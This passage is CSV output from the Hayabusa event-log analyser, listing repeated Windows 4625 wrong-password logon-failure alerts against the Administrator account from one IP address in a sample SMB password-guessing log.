NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: 